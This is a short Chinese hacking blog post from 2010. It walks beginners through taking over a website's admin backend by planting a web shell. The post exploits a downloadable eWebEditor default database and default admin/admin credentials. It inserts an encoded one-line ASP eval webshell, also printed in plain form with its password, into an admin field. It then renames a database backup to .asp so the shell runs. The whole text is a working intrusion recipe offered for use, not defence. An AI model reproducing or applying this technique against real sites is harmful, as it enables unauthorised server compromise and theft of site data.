浏览模式: 标准 | 列表Tag:后台
后台巧妙拿webshell
Submitted by admin
2010, August 28, 10:17 PM
作者:wjs qq825680101
菜菜可以恶补下
朋友发了个后台让帮忙拿shell,图1
现看了上传有ewebeditor编辑器,默认数据库db/ewebeditor.mdb能下载。管理员名字和密码都是admin,但是后台找不到也没找人前人入侵过的痕迹,不然可以修改样式上传。
看到数据库备份,备份文件不能修改,备份名字可以修改。图2
之前入侵过这样的后台,拿shell方法是在管理员那插入一句,话图3
一句话是编码过的┼癥污爠煥敵瑳∨浴≤┩>
<%eval(request("tmd"))%>
密码 tmd
然后数据库备份1.asp,右键属性就看到数据库路径。
用一句话连接。图4
结束